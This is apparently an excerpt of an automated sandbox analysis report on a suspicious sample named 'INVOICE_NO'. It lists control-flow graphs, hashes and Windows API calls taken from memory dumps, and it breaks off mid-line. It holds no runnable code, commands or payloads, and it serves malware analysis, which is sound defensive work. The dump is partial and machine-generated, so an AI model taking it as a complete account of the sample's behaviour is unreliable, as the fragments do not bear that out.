                                            • Source File: 00000000.00000002.402214438.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5350000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $ $ $ $"$$$'$'$($($*$*$-$.$1$=$?$?$F$K$K$K$M$\$|
                                            • API String ID: 0-2269570633
                                            • Opcode ID: 88b0dcf829a69d684237e262a21f235e13dba6dd11820babda01876c1d9d1995
                                            • Instruction ID: cfbc4a37c0de7caa23e01e51de8f63160039386df370cc2e1232211f479e7b59
                                            • Opcode Fuzzy Hash: 88b0dcf829a69d684237e262a21f235e13dba6dd11820babda01876c1d9d1995
                                            • Instruction Fuzzy Hash: B7F20534A10715CFC765EF34C894A9AB7B2FF8A304F6085ADD54AAB360DB35A985CF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05356E00 Relevance: 32.8, Strings: 25, Instructions: 1566COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 456 5356e00-5356e67 461 5356e71-5356e75 call 5356040 456->461 463 5356e7a-5356e85 461->463 465 5356e8f-5356e93 call 5356848 463->465 467 5356e98-5356ea3 465->467 469 5356ead-5356eb1 call 5356858 467->469 471 5356eb6-5356ec1 469->471 473 5356ecb-5356ecf call 5356868 471->473 475 5356ed4-5356edf 473->475 477 5356ee9-5356eeb 475->477 478 5356ef3-5356f1d 477->478 483 5356f27-5356f2b call 5356040 478->483 485 5356f30-5356f3b 483->485 487 5356f45-5356f49 call 5356878 485->487 489 5356f4e-53570b3 call 5356848 call 5356040 call 5356868 call 5356040 call 5356868 call 5356878 * 2 487->489 530 53570b5-53570bb 489->530 531 53570cb-53570fb call 5356888 call 5356898 489->531 532 53570bd 530->532 533 53570bf-53570c1 530->533 538 5357157 531->538 539 53570fd-5357116 call 53568a8 531->539 532->531 533->531 542 5357161-5357165 call 53568b8 538->542 541 535711b-535713e 539->541 546 5357144-5357155 541->546 547 5358896 541->547 545 535716a-5357175 542->545 550 535717f-5357183 call 53568c8 545->550 546->538 546->539 549 535889b-53588c8 547->549 551 53588cf-53588df 549->551 552 53588ca call 5356a80 549->552 554 5357188-5357306 call 53568c8 550->554 552->551 582 5357325-535733e 554->582 583 5357308-5357323 554->583 586 5357355-5357362 582->586 587 5357340-5357353 582->587 583->582 590 535736a-535737a 586->590 587->586 591 535737f-5357392 590->591 593 535739c-53573a9 591->593 594 53573af-53573c1 593->594 596 53573cb-53573e3 594->596 597 53573e9-5358895 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356938 call 5356948 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356958 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 5356968 * 6 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356978 call 5356958 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356958 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 5356938 call 5356948 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356918 call 5356928 call 5356938 call 5356948 call 53568d8 call 53568e8 call 5356988 call 53568f8 call 5356908 call 5356968 * 2 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356978 call 5356968 * 2 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 5356978 call 5356998 call 53568d8 call 53568e8 call 53568f8 call 5356908 call 53569a8 call 53569b8 * 2 call 53569c8 call 53569d8 call 5356a00 call 5356a10 call 5356968 * 4 call 5356a20 call 5356a30 call 5356a40 call 5356a50 call 5356a60 call 53568e8 call 5356a70 * 3 596->597
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.402214438.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5350000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $ $ $ $"$$$'$'$($($*$*$-$.$1$=$?$?$F$K$K$K$M$\$|
                                            • API String ID: 0-2269570633
                                            • Opcode ID: 45128ed066a86a940f41c2713c283e3e791bba21f8c97f3b16fa0077c07534c0
                                            • Instruction ID: cfb51fd1a7986ebe93e7a7def861c1fbcacf9bae81f91ceb72a2aa7632482f1d
                                            • Opcode Fuzzy Hash: 45128ed066a86a940f41c2713c283e3e791bba21f8c97f3b16fa0077c07534c0
                                            • Instruction Fuzzy Hash: 2AF20534A10715CFC765EF34C894ADAB7B2FF8A304F6085A9D54AAB360DB35A985CF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D6A08 Relevance: 1.9, Strings: 1, Instructions: 663COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 913 a6d6a08-a6d6a39 914 a6d6a3b 913->914 915 a6d6a40-a6d75e0 913->915 914->915 917 a6d75e6-a6d75ed 915->917 918 a6d6af2-a6d6c1d 915->918 926 a6d6c1f-a6d6c3a 918->926 927 a6d6c45-a6d6cdb 918->927 926->927 935 a6d6cdd 927->935 936 a6d6ce2-a6d6d24 927->936 935->936 939 a6d6d8d-a6d6dc8 936->939 940 a6d6d26-a6d6d3c 936->940 943 a6d6dca-a6d6de5 939->943 944 a6d6df0 939->944 942 a6d6d41-a6d6d61 940->942 945 a6d6d89-a6d6d8b 942->945 946 a6d6d63-a6d6d7e 942->946 943->944 947 a6d6df1-a6d6dfb 944->947 945->947 946->945 949 a6d6dfd 947->949 950 a6d6e02-a6d6e52 947->950 949->950 955 a6d6e7a-a6d6e93 950->955 956 a6d6e54-a6d6e6f 950->956 957 a6d6e95-a6d6ec9 955->957 958 a6d6ef1-a6d6fa6 955->958 956->955 957->958 963 a6d6ecb-a6d6ee6 957->963 970 a6d6fce-a6d700f 958->970 971 a6d6fa8-a6d6fc3 958->971 963->958 974 a6d7037-a6d7082 970->974 975 a6d7011-a6d702c 970->975 971->970 981 a6d7221-a6d723d 974->981 975->974 982 a6d7087-a6d714d 981->982 983 a6d7243-a6d72c2 981->983 1001 a6d7216-a6d721b 982->1001 1002 a6d7153-a6d71c8 982->1002 990 a6d72ea-a6d7333 983->990 991 a6d72c4-a6d72df 983->991 998 a6d733b-a6d734e 990->998 999 a6d7335-a6d7338 990->999 991->990 1003 a6d7355-a6d7396 998->1003 1004 a6d7350 998->1004 999->998 1001->981 1011 a6d71cd-a6d71ed 1002->1011 1009 a6d73ff-a6d743a 1003->1009 1010 a6d7398-a6d73ae 1003->1010 1004->1003 1016 a6d743c-a6d7457 1009->1016 1017 a6d7462 1009->1017 1015 a6d73b3-a6d73d3 1010->1015 1012 a6d71ef-a6d720a 1011->1012 1013 a6d7215 1011->1013 1012->1013 1013->1001 1018 a6d73fb-a6d73fd 1015->1018 1019 a6d73d5-a6d73f0 1015->1019 1016->1017 1020 a6d7463-a6d7497 1017->1020 1018->1020 1019->1018 1026 a6d74bf-a6d74d9 1020->1026 1027 a6d7499-a6d74b4 1020->1027 1030 a6d752c-a6d75c4 1026->1030 1031 a6d74db-a6d7520 1026->1031 1027->1026 1030->917 1037 a6d752a-a6d752b 1031->1037 1037->1030
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (
                                            • API String ID: 0-3887548279
                                            • Opcode ID: 55886114fe08fcd1ac17c5af9d94779db99fbff80fac1b9be49a98b6f6aea277
                                            • Instruction ID: 34869a03905f53c85890dc5d9a7f37168dc6feac778a45c36de8d18ee0b46ac3
                                            • Opcode Fuzzy Hash: 55886114fe08fcd1ac17c5af9d94779db99fbff80fac1b9be49a98b6f6aea277
                                            • Instruction Fuzzy Hash: 9462D374A112298FDB64DF69C894BDDBBB2FF89304F1481A9D409AB394DB306E85CF41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D8018 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1038 a6d8018-a6d803a 1039 a6d83ea-a6d83ef 1038->1039 1040 a6d8040-a6d807b 1038->1040 1041 a6d83f9-a6d83fc 1039->1041 1042 a6d83f1-a6d83f3 1039->1042 1049 a6d807d-a6d8087 1040->1049 1050 a6d808e-a6d80ae 1040->1050 1044 a6d8404-a6d840c 1041->1044 1042->1041 1046 a6d8412-a6d8419 1044->1046 1049->1050 1052 a6d80c1-a6d80e1 1050->1052 1053 a6d80b0-a6d80ba 1050->1053 1055 a6d80f4-a6d8114 1052->1055 1056 a6d80e3-a6d80ed 1052->1056 1053->1052 1058 a6d8127-a6d8130 1055->1058 1059 a6d8116-a6d8120 1055->1059 1056->1055 1061 a6d8154-a6d815d 1058->1061 1062 a6d8132-a6d814d 1058->1062 1059->1058 1065 a6d815f-a6d817a 1061->1065 1066 a6d8181-a6d818a 1061->1066 1062->1061 1065->1066 1070 a6d818c-a6d818e 1066->1070 1071 a6d8195-a6d81b1 1066->1071 1070->1071 1074 a6d81c9-a6d81cd 1071->1074 1075 a6d81b3-a6d81b9 1071->1075 1078 a6d81cf-a6d81e0 1074->1078 1079 a6d81e7-a6d822f 1074->1079 1076 a6d81bd-a6d81bf 1075->1076 1077 a6d81bb 1075->1077 1076->1074 1077->1074 1078->1079 1084 a6d8231 1079->1084 1085 a6d8253-a6d825a 1079->1085 1086 a6d8234-a6d823a 1084->1086 1087 a6d825c-a6d826b 1085->1087 1088 a6d8271-a6d827f 1085->1088 1089 a6d841a-a6d8420 1086->1089 1090 a6d8240-a6d8246 1086->1090 1087->1088 1095 a6d8289-a6d82b3 1088->1095 1096 a6d8281-a6d8283 1088->1096 1098 a6d8490 1089->1098 1099 a6d8423-a6d8425 1089->1099 1091 a6d8248-a6d824a 1090->1091 1092 a6d8250-a6d8251 1090->1092 1091->1092 1092->1085 1092->1086 1110 a6d82b5-a6d82c3 1095->1110 1111 a6d82e0-a6d82fc 1095->1111 1096->1095 1101 a6d8492 1098->1101 1102 a6d8494-a6d8497 1099->1102 1103 a6d8427-a6d8459 1099->1103 1101->1102 1104 a6d8499-a6d849d 1102->1104 1105 a6d84a4-a6d84b1 1102->1105 1106 a6d84b8-a6d84c8 1103->1106 1107 a6d845b-a6d847c 1103->1107 1104->1105 1105->1106 1114 a6d869e-a6d86a5 1106->1114 1115 a6d84ce-a6d84d8 1106->1115 1107->1106 1113 a6d847e-a6d8484 1107->1113 1110->1111 1125 a6d82c5-a6d82d9 1110->1125 1123 a6d830f-a6d8336 1111->1123 1124 a6d82fe-a6d8308 1111->1124 1113->1101 1116 a6d8486-a6d8488 1113->1116 1118 a6d86b4-a6d86c7 1114->1118 1119 a6d86a7-a6d86ad 1114->1119 1121 a6d84da-a6d84e1 1115->1121 1122 a6d84e2-a6d84ec 1115->1122 1116->1098 1119->1118 1126 a6d86d1-a6d8739 1122->1126 1127 a6d84f2-a6d8532 1122->1127 1136 a6d834e-a6d8352 1123->1136 1137 a6d8338-a6d833e 1123->1137 1124->1123 1125->1111 1177 a6d87a8 1126->1177 1178 a6d873b-a6d8772 1126->1178 1150 a6d854a-a6d854e 1127->1150 1151 a6d8534-a6d853a 1127->1151 1142 a6d836d-a6d8389 1136->1142 1143 a6d8354-a6d8366 1136->1143 1139 a6d8340 1137->1139 1140 a6d8342-a6d8344 1137->1140 1139->1136 1140->1136 1148 a6d838b-a6d8391 1142->1148 1149 a6d83a1-a6d83a5 1142->1149 1143->1142 1152 a6d8395-a6d8397 1148->1152 1153 a6d8393 1148->1153 1149->1046 1156 a6d83a7-a6d83b5 1149->1156 1157 a6d857b-a6d8593 1150->1157 1158 a6d8550-a6d8575 1150->1158 1154 a6d853c 1151->1154 1155 a6d853e-a6d8540 1151->1155 1152->1149 1153->1149 1154->1150 1155->1150 1164 a6d83c7-a6d83cb 1156->1164 1165 a6d83b7-a6d83c5 1156->1165 1170 a6d8595-a6d859a 1157->1170 1171 a6d85a0-a6d85a8 1157->1171 1158->1157 1169 a6d83d1-a6d83e9 1164->1169 1165->1164 1165->1169 1170->1171 1174 a6d85be-a6d85dd 1171->1174 1175 a6d85aa-a6d85b8 1171->1175 1186 a6d85df-a6d85e5 1174->1186 1187 a6d85f5-a6d85f9 1174->1187 1175->1174 1181 a6d87a9-a6d87af 1177->1181 1179 a6d8779-a6d87a7 1178->1179 1180 a6d8774 1178->1180 1179->1181 1180->1179 1184 a6d87b9 1181->1184 1185 a6d87b1 1181->1185 1193 a6d87ba 1184->1193 1185->1184 1189 a6d85e9-a6d85eb 1186->1189 1190 a6d85e7 1186->1190 1191 a6d85fb-a6d8608 1187->1191 1192 a6d8652-a6d869b 1187->1192 1189->1187 1190->1187 1197 a6d863e-a6d864b 1191->1197 1198 a6d860a-a6d863c 1191->1198 1192->1114 1193->1193 1197->1192 1198->1197
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: U
                                            • API String ID: 0-3372436214
                                            • Opcode ID: 1844fa5d1e2b2ed410cf555bdaf4d1cea1a92af51dacc1f4a8e416f635980c3c
                                            • Instruction ID: b3cafaeff2b028bb0cc0495daaa765ad0333bf2d82634f91b49608e6b91ce271
                                            • Opcode Fuzzy Hash: 1844fa5d1e2b2ed410cf555bdaf4d1cea1a92af51dacc1f4a8e416f635980c3c
                                            • Instruction Fuzzy Hash: 08E1EC70B002119FDB29DBB9C864BAEB7FAAF88344F14446DD146DB3A0CB35E901CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05351930 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1206 5351930-535196c 1207 5351972-5351977 1206->1207 1208 5351a1c-5351a3c 1206->1208 1209 5351979-53519b0 1207->1209 1210 53519ca-5351a02 CallWindowProcW 1207->1210 1214 5351a3f-5351a4c 1208->1214 1216 53519b2-53519b8 1209->1216 1217 53519b9-53519c8 1209->1217 1212 5351a04-5351a0a 1210->1212 1213 5351a0b-5351a1a 1210->1213 1212->1213 1213->1214 1216->1217 1217->1214
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 053519F1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.402214438.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5350000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 5b9d10403ecce4541a12d27d763c91a15d08771d58362b725287e9694a098e93
                                            • Instruction ID: ca9064a4dc1092f0b04526bcec6ebd6a5c64b0e7162d0af7a2e275c54d7f38f4
                                            • Opcode Fuzzy Hash: 5b9d10403ecce4541a12d27d763c91a15d08771d58362b725287e9694a098e93
                                            • Instruction Fuzzy Hash: BA411AB9900305CFDB15CF99C484FAABBF5FB88324F248459D45967321D775A845CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D7CA0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1220 a6d7ca0-a6d7d12 PostMessageW 1221 a6d7d1b-a6d7d2f 1220->1221 1222 a6d7d14-a6d7d1a 1220->1222 1222->1221
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0A6D7D05
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: bf22b8af9ba02b0b6f4fc892c70765f95b6e6d670eac39a2109919cde2754015
                                            • Instruction ID: 2a580daef8451069a25a605b0d6c7b44da16d74f03b5c761f9a4557a465a1fd8
                                            • Opcode Fuzzy Hash: bf22b8af9ba02b0b6f4fc892c70765f95b6e6d670eac39a2109919cde2754015
                                            • Instruction Fuzzy Hash: 6E1106B6800349DFDB10CF9AD984BDEBFF4EB58324F248519E455A7610C375A944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D7CA8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1224 a6d7ca8-a6d7d12 PostMessageW 1225 a6d7d1b-a6d7d2f 1224->1225 1226 a6d7d14-a6d7d1a 1224->1226 1226->1225
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0A6D7D05
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 85e065280c8842df08be623285fe48e21b522eadc0cf459c265266256f0eb831
                                            • Instruction ID: 7dabe4797fc6186b26a50311f1c3ca79406fd83bf046d960a95c2bcb057d6c05
                                            • Opcode Fuzzy Hash: 85e065280c8842df08be623285fe48e21b522eadc0cf459c265266256f0eb831
                                            • Instruction Fuzzy Hash: 4811E5B58003499FDB10CF9AD984BDEBBF8EB48324F248419E455A7610C375A984CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0A6D1D85 Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: U$UUUU
                                            • API String ID: 0-2477371010
                                            • Opcode ID: be5739575715265eacac360fcade4e048d01dbdc7fbb194c5c0c8ee19e10eb69
                                            • Instruction ID: e2d7bb213ced14f221ea713c44c0ff035b7176afb935724b0b1b2d651db45ebb
                                            • Opcode Fuzzy Hash: be5739575715265eacac360fcade4e048d01dbdc7fbb194c5c0c8ee19e10eb69
                                            • Instruction Fuzzy Hash: 96515B70E106688FDBA4CFADC884B8DBBF1AF48301F5586AAD059E7215DB349A85CF11
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D9FD8 Relevance: .3, Instructions: 298COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f45d1b3c54d76d78499832e5f65a345ec445e48cb207f301082daf425f1799c
                                            • Instruction ID: d36900917ed8323d2c5310bf89ed225720997ae639a89d979ee3bc62adda7d0d
                                            • Opcode Fuzzy Hash: 8f45d1b3c54d76d78499832e5f65a345ec445e48cb207f301082daf425f1799c
                                            • Instruction Fuzzy Hash: 33D1A574A146048FDB58DFA9C598AA9B7F2BF4D740F2680A8E409EB371DB31AD40CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D0012 Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d373a836ffb2e815f9780a563be8339fcc04838be7974985def8976b91049f62
                                            • Instruction ID: d2f55d7876cb2849bcd76972b4a34ee3f70372b5bf55d9b364cf518e0f90e404
                                            • Opcode Fuzzy Hash: d373a836ffb2e815f9780a563be8339fcc04838be7974985def8976b91049f62
                                            • Instruction Fuzzy Hash: 4E415571E05A589BEB1DCF6B8C5029EFFF3AFC9201F18C5BA845CAA265DB3405468F01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D0040 Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e38a2d3a584763bf474390ce270745a1fa7dd33c850b355fcfdb6ec7efc62471
                                            • Instruction ID: 9594b8d8b8896a996f0a8a86392a89d94b5f702a4e51bc189c921c7337779466
                                            • Opcode Fuzzy Hash: e38a2d3a584763bf474390ce270745a1fa7dd33c850b355fcfdb6ec7efc62471
                                            • Instruction Fuzzy Hash: 50414471D05A588BEB5CCF6BCD4069EFAF3AFC9241F54C1BA841DAA265DB3005828F41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0A6D69F8 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.408412015.000000000A6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a6d0000_INVOICE_NO.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5cb878cad8bd0a0355449ff598411632bf526d52a24a3b2375c90058a1d016f
                                            • Instruction ID: 0784024d576409f25506405ddb2bc3c66008610bf6aa8e52ed1880698fc24b44
                                            • Opcode Fuzzy Hash: f5cb878cad8bd0a0355449ff598411632bf526d52a24a3b2375c90058a1d016f
                                            • Instruction Fuzzy Hash: F931BCB5D156288BEB28CF57D9153DAFBF3AFC5310F04C1AAC50CA6254DB740A858F51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:10.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:204
                                            Total number of Limit Nodes:10
                                            execution_graph 31673 5806e10 31674 5806e3b 31673->31674 31692 5806040 31674->31692 31678 5806e98 31701 5806858 31678->31701 31680 5806eb6 31681 5806040 3 API calls 31680->31681 31682 5806f30 31681->31682 31683 5806848 3 API calls 31682->31683 31684 5806f6c 31683->31684 31685 5806040 3 API calls 31684->31685 31686 5806f8a 31685->31686 31687 5806040 3 API calls 31686->31687 31688 5807004 31687->31688 31691 5807157 31688->31691 31705 5806a80 31688->31705 31690 58088cf 31693 580604b 31692->31693 31694 5806a80 3 API calls 31693->31694 31695 5806e7a 31694->31695 31696 5806848 31695->31696 31697 5806853 31696->31697 31710 1963ba8 31697->31710 31721 1966469 31697->31721 31698 5808bcb 31698->31678 31702 5806863 31701->31702 31834 5806c70 31702->31834 31704 5809aca 31704->31680 31706 5806a8b 31705->31706 31708 1963ba8 3 API calls 31706->31708 31709 1966469 3 API calls 31706->31709 31707 5808954 31707->31690 31708->31707 31709->31707 31711 1963bb3 31710->31711 31713 1966706 31711->31713 31732 58089d0 31711->31732 31736 196887f 31711->31736 31740 58093a8 31711->31740 31744 5809398 31711->31744 31748 1968890 31711->31748 31752 58089e0 31711->31752 31712 1966744 31712->31698 31713->31712 31756 196a990 31713->31756 31722 19664a3 31721->31722 31724 1966706 31722->31724 31726 58089d0 3 API calls 31722->31726 31727 58089e0 3 API calls 31722->31727 31728 1968890 3 API calls 31722->31728 31729 5809398 3 API calls 31722->31729 31730 58093a8 3 API calls 31722->31730 31731 196887f 3 API calls 31722->31731 31723 1966744 31723->31698 31724->31723 31725 196a990 3 API calls 31724->31725 31725->31723 31726->31724 31727->31724 31728->31724 31729->31724 31730->31724 31731->31724 31733 58089e0 31732->31733 31761 5808a39 31733->31761 31734 58089ee 31734->31713 31737 196889f 31736->31737 31738 1968977 3 API calls 31736->31738 31739 1968988 3 API calls 31736->31739 31737->31713 31738->31737 31739->31737 31741 58093b6 31740->31741 31742 1968977 3 API calls 31740->31742 31743 1968988 3 API calls 31740->31743 31741->31713 31742->31741 31743->31741 31746 1968977 3 API calls 31744->31746 31747 1968988 3 API calls 31744->31747 31745 58093b6 31745->31713 31746->31745 31747->31745 31750 1968977 3 API calls 31748->31750 31751 1968988 3 API calls 31748->31751 31749 196889f 31749->31713 31750->31749 31751->31749 31753 58089e5 31752->31753 31755 5808a39 3 API calls 31753->31755 31754 58089ee 31754->31713 31755->31754 31757 196a9c1 31756->31757 31758 196a9e5 31757->31758 31822 196ab40 31757->31822 31826 196ab50 31757->31826 31758->31712 31762 5808a46 31761->31762 31763 5808a57 31761->31763 31766 1968977 31762->31766 31774 1968988 31762->31774 31763->31734 31767 196899b 31766->31767 31768 19689b3 31767->31768 31782 1968c03 31767->31782 31786 1968c10 31767->31786 31768->31763 31769 19689ab 31769->31768 31770 1968bb0 GetModuleHandleW 31769->31770 31771 1968bdd 31770->31771 31771->31763 31775 196899b 31774->31775 31776 19689b3 31775->31776 31780 1968c03 2 API calls 31775->31780 31781 1968c10 2 API calls 31775->31781 31776->31763 31777 19689ab 31777->31776 31778 1968bb0 GetModuleHandleW 31777->31778 31779 1968bdd 31778->31779 31779->31763 31780->31777 31781->31777 31783 1968c10 31782->31783 31785 1968c49 31783->31785 31790 1967d58 31783->31790 31785->31769 31787 1968c24 31786->31787 31788 1967d58 3 API calls 31787->31788 31789 1968c49 31787->31789 31788->31789 31789->31769 31791 19691f0 LoadLibraryExW 31790->31791 31793 1969269 31791->31793 31793->31785 31795 196b890 31793->31795 31796 196aee4 31793->31796 31795->31795 31797 196aeef 31796->31797 31798 1963ba8 3 API calls 31797->31798 31799 196b8ff 31798->31799 31803 196d678 31799->31803 31809 196d690 31799->31809 31800 196b938 31800->31795 31804 196d645 31803->31804 31805 196d68a 31803->31805 31804->31800 31806 196d6cd 31805->31806 31815 196d9c8 31805->31815 31819 196d9d8 31805->31819 31806->31800 31810 196d6c1 31809->31810 31811 196d70e 31809->31811 31812 196d6cd 31810->31812 31813 196d9d8 3 API calls 31810->31813 31814 196d9c8 3 API calls 31810->31814 31811->31800 31812->31800 31813->31811 31814->31811 31816 196d9d8 31815->31816 31817 1968988 LoadLibraryExW GetModuleHandleW GetModuleHandleW 31816->31817 31818 196d9e1 31817->31818 31818->31806 31820 1968988 LoadLibraryExW GetModuleHandleW GetModuleHandleW 31819->31820 31821 196d9e1 31820->31821 31821->31806 31823 196ab48 31822->31823 31824 196ab97 31823->31824 31830 19691bc 31823->31830 31824->31758 31827 196ab5d 31826->31827 31828 196ab97 31827->31828 31829 19691bc 3 API calls 31827->31829 31828->31758 31829->31828 31831 19691c1 31830->31831 31832 196aee4 3 API calls 31831->31832 31833 196b890 31831->31833 31832->31833 31833->31833 31835 5806c7b 31834->31835 31839 19635e0 31835->31839 31843 1964011 31835->31843 31836 580a1e1 31836->31704 31840 19635eb 31839->31840 31847 1963610 31840->31847 31842 196407a 31842->31836 31844 1964041 31843->31844 31845 1963610 3 API calls 31844->31845 31846 196407a 31845->31846 31846->31836 31848 196361b 31847->31848 31849 1963ba8 3 API calls 31848->31849 31850 1964179 31849->31850 31850->31842 31650 aab7a28 31651 aab7bb3 31650->31651 31652 aab7a4e 31650->31652 31652->31651 31657 196f3e0 SetWindowLongW 31652->31657 31659 196f3d8 SetWindowLongW 31652->31659 31661 aab7ca8 PostMessageW 31652->31661 31663 aab7ca0 PostMessageW 31652->31663 31658 196f44c 31657->31658 31658->31652 31660 196f44c 31659->31660 31660->31652 31662 aab7d14 31661->31662 31662->31652 31664 aab7d14 31663->31664 31664->31652 31665 aab9568 FindCloseChangeNotification 31666 aab95cf 31665->31666 31851 5800098 31853 58000c5 31851->31853 31852 58000f7 31853->31852 31855 5800628 31853->31855 31857 580063c 31855->31857 31856 58006c8 31856->31852 31860 58006d0 31857->31860 31865 58006e0 31857->31865 31861 5800670 31860->31861 31862 58006de 31860->31862 31861->31856 31864 58006f1 31862->31864 31868 5801900 31862->31868 31864->31856 31866 58006f1 31865->31866 31867 5801900 2 API calls 31865->31867 31866->31856 31867->31866 31872 5801920 31868->31872 31876 5801930 31868->31876 31869 580191a 31869->31864 31873 5801972 